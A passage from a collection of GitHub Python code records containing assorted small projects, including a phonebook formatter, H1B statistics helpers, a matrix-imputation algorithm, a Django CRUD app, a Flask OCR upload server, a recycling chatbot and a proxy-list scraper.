i in range(len(nw2)):\r\n if(i % 2 == 0):\r\n a.append(nw2[i])\r\n else:\r\n b.append(nw2[i])\r\nprint(a)\r\nprint(b)\r\n\r\nf = open(\"phonebooklist.txt\", \"w\")\r\nm1 = []\r\nfor i in range(0, len(a)):\r\n m1.append(len(a[i]))\r\nx1 = max(m1)\r\nm2 = []\r\nfor i in range(0, len(b)):\r\n m2.append(len(b[i]))\r\nx2 = max(m2)\r\nprint('-'*(x1+x2+4+15))\r\nf.write('-'*(x1+x2+4+15)+\"\\n\")\r\nprint(\"| SN | Name | Phone No. |\")\r\nf.write(\"| SN | Name | Phone No. |\"+\"\\n\")\r\nprint('-'*(x1+x2+4+15))\r\nf.write('-'*(x1+x2+4+15)+\"\\n\")\r\nfor i in range(0, len(a)):\r\n i1 = str(i+1)\r\n print(\"|\", i1, ' '*(3-len(i1)), \"|\", a[i], ' '*(\r\n (x1) - len(a[i])), \"|\", b[i], ' '*((x2) - len(b[i])), \"|\")\r\n f.write(\"| \" + i1 + ' '*(3-len(i1)) + \" | \" + a[i] + ' '*(\r\n (x1) - len(a[i])) + \" | \" + b[i] + ' '*((x2) - len(b[i])) + \" |\"+\"\\n\")\r\n print('-'*(x1+x2+4+15))\r\n f.write('-'*(x1+x2+4+15)+\"\\n\")\r\nf.close()\r\n\r\n# A CODE BY TUSHAR SINGH","repo_name":"CodeTusharSingh/Python_Assignment","sub_path":"phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"44691789510","text":"import re\nimport sys\n\n##\nclass count_instances(dict):\n '''Instance counter implemented as a Dict subclass.\n Elements are stored as dictionary keys and their counts\n are stored as dictionary values.\n NOTE: An alternative to this can be using the Counter object in Collections,\n which may provide a more wider range of functionality than this fuction\n \n '''\n\n def __init__(*args, **kwds):\n '''Initial an empty object for counting instances.\n '''\n self, *args = args\n super(count_instances, self).__init__()\n self.update(*args, **kwds)\n\n def __missing__(self, key):\n '''This ensures that a missing key does not raise KeyError\n '''\n return 0\n\n def sort_by_val(self, n=None):\n '''Function to sort through the counted instances using the values first\n and then in case of ties, alphabetically\n '''\n if n is None: n=len(self.items())\n return sorted(self.items(), key=lambda item: (-item[1], item[0]), reverse = False)[:n]\n##\ndef clean(line):\n '''This function is used to process through a line from the file if parsing\n does not work properly '''\n\n # We first search for and ignore any special characters which may effect REGEX\n line = re.sub(r'(?i)[^a-z0-9;\" +-]','',line)\n # Find portions of string within \" \", look for ';' and replace them\n matches = re.findall('\\\".+?\\\"',line)\n for match in matches:\n line = re.sub(''.join(match),''.join(match).replace(';',''),line)\n return [s.strip() for s in line.split(\";\")]\n\n##\ndef get_indices(header):\n '''This function is used to get valid indices from the header of each file\n Files prior to 2014 have the first format while the laters ones have the second\n one. '''\n try:\n idx1 = header.index('LCA_CASE_SOC_NAME')\n idx2 = header.index('LCA_CASE_WORKLOC1_STATE')\n idx3 = header.index('STATUS')\n except:\n idx1 = header.index('SOC_NAME')\n idx2 = header.index('WORKSITE_STATE')\n idx3 = header.index('CASE_STATUS')\n return idx1,idx2,idx3\n\n##\ndef write_output(sorted_list,total,nfile):\n '''This function is used to generate the top10**.txt files as requested'''\n \n if nfile.find('state') != -1:\n op_header = ('TOP_STATES','NUMBER_CERTIFIED_APPLICATIONS','PERCENTAGE')\n elif nfile.find('occupation') != -1:\n op_header = ('TOP_OCCUPATIONS','NUMBER_CERTIFIED_APPLICATIONS','PERCENTAGE')\n \n with open(nfile,'w') as op_file:\n print('%s;%s;%s' %op_header,file=op_file)\n for item in sorted_list:\n print('%s;%i;%0.1f%%' %(item[0],item[1],item[1]*100/total),file=op_file)\n op_file.close()\n\n","repo_name":"anaszain89/h1b_data_statistics","sub_path":"src/h1b_statistic_lib.py","file_name":"h1b_statistic_lib.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39487976359","text":"#shttps://leetcode.com/problems/smallest-subsequence-of-distinct-characters/discuss/308210/JavaPython-Stack-Solution-O(N)\r\nclass Solution:\r\n def smallestSubsequence(self, S):\r\n last = {c: i for i, c in enumerate(S)}\r\n stack = []\r\n for i, c in enumerate(S):\r\n if c in stack: continue\r\n while stack and stack[-1] > c and i < last[stack[-1]]:\r\n stack.pop()\r\n stack.append(c)\r\n return \"\".join(stack)\r\n\r\nprint(Solution().smallestSubsequence(\"cdadabcc\"))","repo_name":"yigalirani/leetcode","sub_path":"1081_Smallest_Subsequence_of_Distinct_Characters.py","file_name":"1081_Smallest_Subsequence_of_Distinct_Characters.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39589561694","text":"from django.contrib import admin\n\nfrom apps.overrides.admin import AutofillCreatorModelAdmin, linkify\nfrom apps.reputation.models import PlusRep\n\n\n@admin.register(PlusRep)\nclass PlusRepAdmin(AutofillCreatorModelAdmin):\n autocomplete_fields = [\"giver\", \"receiver\"]\n list_display = (\n \"id\",\n \"created_at\",\n linkify(\"giver\"),\n linkify(\"receiver\"),\n \"message\",\n \"creator\",\n )\n list_filter = (\n \"giver\",\n \"receiver\",\n \"creator\",\n )\n fields = (\"giver\", \"receiver\", \"message\", \"creator\")\n","repo_name":"HaloFunTime/hft-backend","sub_path":"apps/reputation/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"35509611706","text":"from SWS_Scraping import *\nfrom Wind_Dictionary import *\nimport time\n\n\ndef main():\n # Initialize the SWS Site\n SWS_Site = WebScrape()\n\n # Select the available years\n Years = [str(Year) for Year in range(2016, 2024)]\n final_dataframes = []\n for Year in Years:\n # Select the usable months and days from the Wind_Dictionary Library\n date_dic = WindDictionary(Year)\n Months = date_dic.getMonths()\n for Month in Months:\n Days = date_dic.getDays(Month)\n for day in Days: \n SWS_Site.selectDate(Year, Month, day)\n time.sleep(2)\n\n # Downloading Data \n final_dataframes.append(SWS_Site.collectData())\n print(f\"Day added from {Year} - {Month}\", flush = True)\n \n SWS_Site.end()\n complete_dataset = pd.concat(final_dataframes)\n complete_dataset.to_csv(f'SquamishWind.csv', index=False)\n return complete_dataset\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TommyR2/SWS_Scraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31745927795","text":"\"\"\"\nSynthetic Nearest Neighbors algorithm\n\"\"\"\nimport sys\nimport warnings \nimport random\nimport numpy as np \nimport networkx as nx\nfrom networkx.algorithms.clique import find_cliques\nfrom sklearn.utils import check_array\n\nclass SyntheticNearestNeighbors(): \n\t\"\"\"\n\tImpute missing entries in a matrix via SNN algorithm\n\t\"\"\"\n\tdef __init__(\n\t\t\tself,\n\t\t\tn_neighbors=1, \n\t\t\tweights='uniform',\n\t\t\trandom_splits=False,\n\t\t\tmax_rank=None,\n\t\t\tspectral_t=None,\n\t\t\tlinear_span_eps=0.1,\n\t\t\tsubspace_eps=0.1, \n\t\t\tmin_value=None,\n\t\t\tmax_value=None,\n\t\t\tverbose=True): \n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\tn_neighbors : int \n\t\tNumber of synthetic neighbors to construct\n\n\t\tweights : str \n\t\tWeight function used in prediction. Possible values: \n\t\t(a) 'uniform': each synthetic neighbor is weighted equally \n\t\t(b) 'distance': weigh points inversely with distance (as per train error)\n\n\t\trandom_splits : bool \n\t\tRandomize donors prior to splitting \n\n\t\tmax_rank : int \n\t\tPerform truncated SVD on training data with this value as its rank \n\n\t\tspectral_t : float \n\t\tPerform truncated SVD on training data with (100*thresh)% of spectral energy retained. \n\t\tIf omitted, then the default value is chosen via Donoho & Gavish '14 paper. \n\n\t\tlinear_span_eps : float\n\t\tIf the (normalized) train error is greater than (100*linear_span_eps)%,\n\t\tthen the missing pair fails the linear span test. \n\n\t\tsubspace_eps : float\n\t\tIf the test vector (used for predictions) does not lie within (100*subspace_eps)% of \n\t\tthe span covered by the training vectors (used to build the model), \n\t\tthen the missing pair fails the subspace inclusion test. \n\n\t\tmin_value : float \n\t\tMinumum possible imputed value \n\n\t\tmax_value : float \n\t\tMaximum possible imputed value \n\n\t\tverbose : bool \n\t\t\"\"\"\n\t\tself.n_neighbors = n_neighbors \n\t\tself.weights = weights\n\t\tself.random_splits = random_splits\n\t\tself.max_rank = max_rank \n\t\tself.spectral_t = spectral_t\n\t\tself.linear_span_eps = linear_span_eps\n\t\tself.subspace_eps = subspace_eps\n\t\tself.min_value = min_value \n\t\tself.max_value = max_value \n\t\tself.verbose = verbose\n\n\tdef __repr__(self):\n\t\t\"\"\" \n\t\tprint parameters of SNN class\n\t\t\"\"\"\n\t\treturn str(self)\n\n\tdef __str__(self):\n\t\tfield_list = []\n\t\tfor (k, v) in sorted(self.__dict__.items()):\n\t\t\tif (v is None) or (isinstance(v, (float, int))):\n\t\t\t\tfield_list.append(\"%s=%s\" % (k, v))\n\t\t\telif isinstance(v, str):\n\t\t\t\tfield_list.append(\"%s='%s'\" % (k, v))\n\t\treturn \"%s(%s)\" % (\n\t\t\tself.__class__.__name__,\", \".join(field_list))\n\n\tdef _check_input_matrix(self, X, missing_mask):\n\t\t\"\"\"\n\t\tcheck to make sure that the input matrix \n\t\tand its mask of missing values are valid.\n\t\t\"\"\"\n\t\tif len(X.shape)!=2:\n\t\t\traise ValueError(\n\t\t\t\t\"expected 2d matrix, got %s array\" % (X.shape,)\n\t\t\t)\n\t\t(m, n) = X.shape \n\t\tif not len(missing_mask)>0: \n\t\t\twarnings.simplefilter(\"always\")\n\t\t\twarnings.warn(\n\t\t\t\t\"input matrix is not missing any values\"\n\t\t\t)\n\t\tif len(missing_mask)==int(m*n): \n\t\t\traise ValueError(\n\t\t\t\t\"input matrix must have some observed (i.e., non-missing) values\"\n\t\t\t)\n\n\tdef _prepare_input_data(self, X, missing_mask):\n\t\t\"\"\"\n\t\tprepare input matrix X. return if valid else terminate \n\t\t\"\"\"\n\t\tX = check_array(X, force_all_finite=False)\n\t\tif (X.dtype!=\"f\") and (X.dtype!=\"d\"):\n\t\t\tX = X.astype(float)\n\t\tself._check_input_matrix(X, missing_mask)\n\t\treturn X\n\n\tdef _check_weights(self, weights):\n\t\t\"\"\"\n\t\tcheck to make sure weights are valid\n\t\t\"\"\"\n\t\tif weights not in (\"uniform\", \"distance\"):\n\t\t\traise ValueError(\n\t\t\t\t\"weights not recognized: should be 'uniform' or 'distance'\"\n\t\t\t)\n\t\treturn weights\n\n\tdef _split(self, arr, k):\n\t\t\"\"\"\n\t\tsplit array arr into k subgroups of roughly equal size\n\t\t\"\"\"\n\t\t(m, n) = divmod(len(arr), k)\n\t\treturn (arr[i*m + min(i, n): (i+1)*m + min(i+1, n)] for i in range(k))\n\n\tdef _find_anchors(self, X, missing_pair): \n\t\t\"\"\"\n\t\tfind model learning submatrix by reducing to max biclique problem\n\t\t\"\"\"\n\t\t(missing_row, missing_col) = missing_pair\n\t\tobs_rows = np.argwhere(~np.isnan(X[:, missing_col])).flatten()\n\t\tobs_cols = np.argwhere(~np.isnan(X[missing_row, :])).flatten()\n\n\t\t# dennis: make sure (i,j) not in (obs_rows, obs_cols)\n\n\t\t# create bipartite incidence matrix \n\t\tB = X[obs_rows]\n\t\tB = B[:, obs_cols]\n\t\tif not np.any(np.isnan(B)): # check if fully connected already\n\t\t\treturn (obs_rows, obs_cols)\n\t\tB[np.isnan(B)] = 0 \n\n\t\t# bipartite graph \n\t\t(n_rows, n_cols) = B.shape \n\t\tA = np.block([[np.ones((n_rows, n_rows)), B],\n\t\t \t\t\t [B.T, np.ones((n_cols, n_cols))]])\n\t\tG = nx.from_numpy_matrix(A)\n\n\t\t# find max clique that yields the most square (nxn) matrix\n\t\tcliques = list(find_cliques(G))\n\t\td_min = 0 \n\t\tmax_clique_rows_idx = False\n\t\tmax_clique_cols_idx = False\n\t\tfor clique in cliques: \n\t\t\tclique = np.sort(clique)\n\t\t\tclique_rows_idx = clique[clique=n_rows] - n_rows\n\t\t\td = min(len(clique_rows_idx), len(clique_cols_idx))\n\t\t\tif d>d_min: \n\t\t\t\td_min = d \n\t\t\t\tmax_clique_rows_idx = clique_rows_idx\n\t\t\t\tmax_clique_cols_idx = clique_cols_idx\n\n\t\t# determine model learning rows & cols \n\t\tanchor_rows = obs_rows[max_clique_rows_idx]\n\t\tanchor_cols = obs_cols[max_clique_cols_idx]\n\t\treturn (anchor_rows, anchor_cols)\n\n\tdef _spectral_rank(self, s):\n\t\t\"\"\"\n\t\tretain all singular values that compose at least (100*self.spectral_t)% spectral energy\n\t\t\"\"\"\n\t\tif self.spectral_t==1.0: \n\t\t\trank = len(s)\n\t\telse: \n\t\t\ttotal_energy = (s**2).cumsum() / (s**2).sum()\n\t\t\trank = list((total_energy>self.spectral_t)).index(True) + 1\n\t\treturn rank\n\n\tdef _universal_rank(self, s, ratio): \n\t\t\"\"\"\n\t\tretain all singular values above optimal threshold as per Donoho & Gavish '14:\n\t\thttps://arxiv.org/pdf/1305.5870.pdf\n\t\t\"\"\" \n\t\tomega = 0.56*ratio**3 - 0.95*ratio**2 + 1.43 + 1.82*ratio\n\t\tt = omega * np.median(s) \n\t\trank = max(len(s[s>t]), 1)\n\t\treturn rank \n\n\tdef _pcr(self, X, y):\n\t\t\"\"\"\n\t\tprincipal component regression (PCR) \n\t\t\"\"\"\n\t\t(u, s, v) = np.linalg.svd(X, full_matrices=False)\n\t\tif self.max_rank is not None: \n\t\t\trank = self.max_rank \n\t\telif self.spectral_t is not None: \n\t\t\trank = self._spectral_rank(s)\n\t\telse: \n\t\t\t(m, n) = X.shape \n\t\t\trank = self._universal_rank(s, ratio=m/n)\n\t\ts_rank = s[:rank]\n\t\tu_rank = u[:, :rank]\n\t\tv_rank = v[:rank, :] \n\t\tbeta = ((v_rank.T/s_rank) @ u_rank.T) @ y\n\t\treturn (beta, u_rank, s_rank, v_rank)\n\n\tdef _clip(self, x):\n\t\t\"\"\"\n\t\tclip values to fall within range [min_value, max_value]\n\t\t\"\"\"\n\t\tif self.min_value is not None:\n\t\t\tx = self.min_value if xself.max_value else x \n\t\treturn x\n\n\tdef _train_error(self, X, y, beta): \n\t\t\"\"\"\n\t\tcompute (normalized) training error\n\t\t\"\"\" \n\t\ty_pred = X @ beta \n\t\tdelta = np.linalg.norm(y_pred-y)\n\t\tratio = delta / np.linalg.norm(y)\n\t\treturn ratio**2\n\n\tdef _subspace_inclusion(self, V1, X2):\n\t\t\"\"\"\n\t\tcompute subspace inclusion statistic \n\t\t\"\"\" \n\t\tdelta = (np.eye(V1.shape[1]) - (V1.T@V1)) @ X2 \n\t\tratio = np.linalg.norm(delta) / np.linalg.norm(X2)\n\t\treturn ratio**2\n\n\tdef _isfeasible(self, train_error, subspace_inclusion_stat): \n\t\t\"\"\"\n\t\tcheck feasibility of prediction\n\t\tTrue iff linear span + subspace inclusion tests both pass\n\t\t\"\"\" \n\t\t# linear span test\n\t\tls_feasible = True if train_error<=self.linear_span_eps else False \n\n\t\t# subspace test\n\t\ts_feasible = True if subspace_inclusion_stat<=self.subspace_eps else False \n\t\treturn True if (ls_feasible and s_feasible) else False \n\n\tdef _synth_neighbor(self, X, missing_pair, anchor_rows, anchor_cols, covariates=None): \n\t\t\"\"\"\n\t\tconstruct the k-th synthetic neighbor \n\t\t\"\"\"\n\t\t# initialize\n\t\t(missing_row, missing_col) = missing_pair\n\t\ty1 = X[missing_row, anchor_cols]\n\t\tX1 = X[anchor_rows, :] \n\t\tX1 = X1[:, anchor_cols]\n\t\tX2 = X[anchor_rows, missing_col]\n\n\t\t# add covariates\n\t\tif covariates is not None: \n\t\t\ty1_covariates = np.hstack([y1, covariates[missing_row]])\n\t\t\tX1_covariates = np.hstack([X1, covariates[anchor_rows]])\n\t\telse:\n\t\t\ty1_covariates = y1.copy()\n\t\t\tX1_covariates = X1.copy()\n\n\t\t# learn k-th synthetic neighbor\n\t\t(beta, _, s_rank, v_rank) = self._pcr(X1_covariates.T, y1_covariates)\n\n\t\t# prediction\n\t\tpred = self._clip(X2@beta) \n\n\t\t# diagnostics \n\t\ttrain_error = self._train_error(X1.T, y1, beta)\n\t\tsubspace_inclusion_stat = self._subspace_inclusion(v_rank, X2) \n\t\tfeasible = self._isfeasible(train_error, subspace_inclusion_stat)\n\n\t\t# assign weight of k-th synthetic neighbor\n\t\tif self.weights=='uniform':\n\t\t\tweight = 1 \n\t\telif self.weights=='distance':\n\t\t\td = train_error + subspace_inclusion_stat\n\t\t\tweight = 1/d if d>0 else sys.float_info.max\n\t\treturn (pred, feasible, weight)\n\n\tdef _predict(self, X, missing_pair, covariates=None): \n\t\t\"\"\" \n\t\tcombine predictions from all synthetic neighbors \n\t\t\"\"\"\n\t\t# find anchor rows and cols\n\t\t(anchor_rows, anchor_cols) = self._find_anchors(X, missing_pair=missing_pair) \n\t\tif not anchor_rows.size: \n\t\t\t(pred, feasible) = (np.nan, False)\n\t\telse: \n\t\t\tif self.random_splits:\n\t\t\t\tanchor_rows = np.random.permutation(anchor_rows)\n\t\t\tanchor_rows_splits = list(self._split(anchor_rows, \n\t\t\t\t\t\t\t\t\t\t\t\t k=self.n_neighbors))\n\t\t\tpred = np.zeros(self.n_neighbors)\n\t\t\tfeasible = np.zeros(self.n_neighbors)\n\t\t\tw = np.zeros(self.n_neighbors)\n\n\t\t\t# iterate through all row splits\n\t\t\tfor (k, anchor_rows_k) in enumerate(anchor_rows_splits): \n\t\t\t\t(pred[k], feasible[k], w[k]) = self._synth_neighbor(X,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t missing_pair=missing_pair, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t anchor_rows=anchor_rows_k, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t anchor_cols=anchor_cols,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t covariates=covariates)\n\t\t\tw /= np.sum(w)\n\t\t\tpred = np.average(pred, weights=w)\n\t\t\tfeasible = all(feasible)\n\t\treturn (pred, feasible)\n\n\tdef fit_transform(self, X, covariates=None, test_set=None): \n\t\t\"\"\"\n\t\tcomplete missing entries in matrix \n\t\t\"\"\" \n\t\t# get missing entries to impute\n\t\tmissing_set = test_set if test_set is not None else np.argwhere(np.isnan(X))\n\t\tnum_missing = len(missing_set)\n\n\t\t# check and prepare data \n\t\tX = self._prepare_input_data(X, missing_set)\n\n\t\t# check weights\n\t\tself.weights = self._check_weights(self.weights)\n\n\t\t# initialize \n\t\tX_imputed = X.copy() \n\t\tstd_matrix = np.zeros(X.shape)\n\t\tself.feasible = np.empty(X.shape)\n\t\tself.feasible.fill(np.nan)\n\n\t\t# complete missing entries \n\t\tfor (i, missing_pair) in enumerate(missing_set): \n\t\t\tif self.verbose: \n\t\t\t\tprint(\"[SNN] iteration {} of {}\".format(i+1, num_missing))\n\n\t\t\t# predict missing entry\n\t\t\t(pred, feasible) = self._predict(X, \n\t\t\t\t\t\t\t\t\t\t\t missing_pair=missing_pair,\n\t\t\t\t\t\t\t\t\t \t covariates=covariates)\n\n\t\t\t# store in imputed matrices\n\t\t\t(missing_row, missing_col) = missing_pair\n\t\t\tX_imputed[missing_row, missing_col] = pred \n\t\t\tself.feasible[missing_row, missing_col] = feasible\n\n\t\tif self.verbose:\n\t\t\tprint(\"[SNN] complete\")\n\t\treturn X_imputed\n\n\n\n\n","repo_name":"deshen24/syntheticNN","sub_path":"snn.py","file_name":"snn.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"26341540170","text":"import requests\n\nclass APITestCase:\n # def __init__(self, base_url):\n # self.base_url = base_url\n\n def send_request(self, method, url, params=None, data=None):\n response = requests.request(method, url, params=params, json=data)\n return response\n\n def validate_response_code(self, response, expected_status_code):\n #assert response.status_code == expected_status_code, f\"Expected status code {expected_status_code}, but got {response.status_code}.\"\n if response.status_code == expected_status_code:\n return True\n else:\n return False\n\n def validate_json(self, response, expected_json):\n assert response.json() == expected_json, f\"Expected JSON {expected_json}, but got {response.json()}.\"\n\n def validate_response_time(self, response):\n response_time = response.elapsed.total_seconds()\n assert response_time < 1500, \"Response time is not less than 1500ms\"\n\n def get_user_id_by_title(self, endpoint, title):\n #url = 'https://jsonplaceholder.typicode.com/posts'\n url = self.base_url + endpoint\n params = {'title': title}\n\n response = requests.get(url, params=params)\n if response.status_code == 200:\n data = response.json()\n if data:\n return data[0]['userId']\n else:\n raise ValueError('Title not found.')\n else:\n raise ValueError('Error occurred while fetching data.')\n\n","repo_name":"nileshrmore15/JsonholderApi","sub_path":"JsonholderApi/Utilities/APIhelper.py","file_name":"APIhelper.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30654882714","text":"import asyncio\nimport re\n\nfrom flask import Flask\n\nfrom ocr_reader import getDocumentId\n\nUPLOAD_FOLDER = 'C:/uploads'\n\napp = Flask(__name__)\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024\n\nimport os\nimport urllib.request\n\nfrom flask import Flask, request, redirect, jsonify\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@app.route('/file-upload', methods=['POST'])\nasync def upload_file():\n # check if the post request has the file part\n if 'file' not in request.files:\n resp = jsonify({'message': 'No file part in the request'})\n resp.status_code = 400\n return resp\n file = request.files['file']\n if file.filename == '':\n resp = jsonify({'message': 'No file selected for uploading'})\n resp.status_code = 400\n return resp\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n result = await get_document_id(f'{UPLOAD_FOLDER}/{filename}')\n if len(result) == 0:\n result = 'Not Detected'\n\n resp = jsonify({'message': f'File successfully uploaded named {result}'})\n resp.status_code = 201\n os.remove(f'{UPLOAD_FOLDER}/{filename}')\n return resp\n else:\n resp = jsonify({'message': 'Allowed file types are txt, pdf, png, jpg, jpeg, gif'})\n resp.status_code = 400\n return resp\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host=\"0.0.0.0\", port=port)\n\n\nasync def get_document_id(path):\n result = getDocumentId(path)\n length = 10\n var = [word for word in result.split() if len(word) == length]\n doc_name = ''\n for tenWord in var:\n if bool(re.search(r'^[a-zA-Z]{5}[0-9]{4}[a-zA-Z]$', re.sub(r'\\s+', '', tenWord))):\n doc_name = re.search(r'^[a-zA-Z]{5}[0-9]{4}[a-zA-Z]$', re.sub(r'\\s+', '', tenWord)).string\n break\n else:\n doc_name = ''\n print(f'document name {doc_name}')\n return doc_name\n","repo_name":"himanshu-kashware/ocr_reader","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39876369320","text":"from django.shortcuts import render, redirect\nfrom coursework.models import Cars\nfrom coursework.forms import CarsForm\n\n\ndef index(request):\n return render(request, 'index.html', {'title': 'Головна сторінка', 'page': 'index'})\n\n\ndef cars(request):\n return render(request, 'cars.html', {'title': 'Перелік', 'page': 'cars', 'cars': Cars.objects.all()})\n\n\ndef add(request):\n if request.method == \"POST\":\n form = CarsForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/cars')\n else:\n form = CarsForm()\n return render(request, 'add.html', {'title': 'Додати авто', 'page': 'cars', 'form': form})\n\n\ndef edit(request, car_id):\n car = Cars.objects.get(id=car_id)\n if request.method == \"POST\":\n form = CarsForm(request.POST, instance=car)\n if form.is_valid():\n form.save()\n return redirect(\"/cars\")\n form = CarsForm(instance=car)\n return render(request, 'edit.html', {'title': 'Редагувати авто', 'page': 'cars', 'car': form})\n\n\ndef update(request, car_id):\n car = Cars.objects.get(id=car_id)\n form = CarsForm(request.POST, instance=car)\n if form.is_valid():\n form.save()\n return redirect(\"/cars\")\n return render(request, 'edit.html', {'car': car})\n\n\ndef destroy(request, car_id):\n car = Cars.objects.get(id=car_id)\n car.delete()\n return redirect(\"/cars\")\n","repo_name":"kosariev/cs22m-python","sub_path":"coursework/coursework/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37695930638","text":"from random import randint\nimport string\nimport time\n\ndef remove_punctuation(x):\n table = str.maketrans({key: None for key in string.punctuation})\n return x.translate(table)\n\n#Greeting\ngreetings = [\"Hello!\", \"Hey!\", \"Hey there!\", \"Hi!\", \"Hi, how you doing?\"]\nprint(greetings[randint(0, len(greetings)-1)])\n\nanswer_processed = \" yes \"\n\nwhile answer_processed.lower().find(\" yes \") > -1 or answer_processed.lower().find(\" y \") > -1 or answer_processed.lower().find(\" yeah \") > -1:\n\n #Ensure what they are asking for is included.\n contains = False\n reply = input(\"What would you like to recycle today?\")\n while contains == False:\n reply_processed = \" \" + remove_punctuation(reply).lower() + \" \"\n recyclables = [\"battery\", \"batteries\", \"computer\", \"phone\", \"laptop\", \"desktop\", \"cellphone\", \"electronic\", \"electronics\", \"aluminum\", \"can\", \"cans\", \"soda\", \"pop\", \"toilet bowl cleaner\", \"shower cleaner\", \"tile cleaner\", \"carpet cleaner\", \"rust remover\", \"pesticides\", \"herbicides\", \"fertilizer\", \"insecticides\", \"insecticide\", \"fertilizers\", \"herbicide\", \"pesticide\"]\n #batteries = 0, 2\n #electronic = 2 - 9\n #aluminum cans = 9 - 14\n #household chemicals = 14 - 19\n #garden chemicals = 19 - 27\n recyclables_processed = \" \"\n\n for a in range(0, len(recyclables)-1):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n\n if contains == False:\n print(\"Sorry, we don't have info on how to recycle that.\")\n time.sleep(1)\n reply = input(\"What else would you like to recycle today?\").lower()\n\n #Batteries\n\n contains = False\n for a in range(0,2):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n second_reply = input(\"What brand is your battery?\").lower()\n contains = False\n battery_brands = [\"duracell\",\"energizer\",\"rayovac\",\"panasonic\"]\n if second_reply in battery_brands:\n print(\"That's an alkaline battery. All alkaline batteries can be thrown away normally unless they are rechargable.\")\n else:\n print(\"You can drop your battery off at a local Household Hazardous Waste/E-Waste Collection Center.\")\n time.sleep(2)\n print(\"Go to www.call2recycle.org to find a location near you.\")\n time.sleep(1)\n\n #Electronics\n\n electronics = [\"computer\", \"phone\", \"laptop\", \"desktop\", \"cellphone\", \"device\", \"electronic\"]\n\n contains = False\n for a in range(2,9):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"All old electronics can be disposed of at your local recycler.\")\n time.sleep(3)\n print(\"Many non-profit organizations can recycle them too.\")\n time.sleep(3)\n print(\"Call2Recycle also has drop-off locations for cell phones throughout the USA.\")\n time.sleep(2)\n print(\"Go to www.call2recycle.org to find a location near you.\")\n time.sleep(1)\n\n #Aluminum Cans\n\n contains = False\n for a in range(9,14):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"Aluminum cans are infinitely recyclable! They can be back on shelves within 60 days of recycling.\")\n time.sleep(3)\n print(\"Use Earth911.com's Recycling Search to find the nearest drop-off center.\")\n time.sleep(2)\n print(\"Cans are also typically available for pickup alongside other recyclables and your local waste pick-up program. :)\")\n time.sleep(1)\n\n #Household chemicals\n\n contains = False\n for a in range(14,19):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"Dispose of household chemicals the same way they are used, such as down the drain.\")\n\n #Garden chemicals\n\n contains = False\n for a in range(19,27):\n recyclables_processed = \" \" + recyclables[a] + \" \"\n contains = contains or not -1 == reply_processed.find(recyclables_processed)\n if contains == True:\n print(\"You can drop off your garden chemicals at a local Household Hazardous Waste Center.\")\n\n answer = input(\"Would you like to recycle anything else?\")\n answer_processed = \" \" + remove_punctuation(answer) + \" \"\n","repo_name":"samantharivera0/Recycling-Resources-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42004783402","text":"import logging\nimport time\nimport urllib.request\nimport zlib\nimport pandas as pd\nfrom socket import timeout\n\nimport requests\nfrom bs4 import BeautifulSoup as bs, BeautifulSoup\n\nfrom constants import TEST_PING_URL, PROXY_LIST_LENGTH, TEST_PING_TIMEOUT, DRILL_TIMEOUT\nfrom logger import init_logger\n\n\ndef get_free_proxy_list():\n url = \"https://free-proxy-list.net/\"\n soup = bs(requests.get(url).content, \"html.parser\")\n proxies = []\n for row in soup.find(\"table\", attrs={\"class\": \"table table-striped table-bordered\"}).find_all(\"tr\")[1:]:\n tds = row.find_all(\"td\")\n try:\n ip = 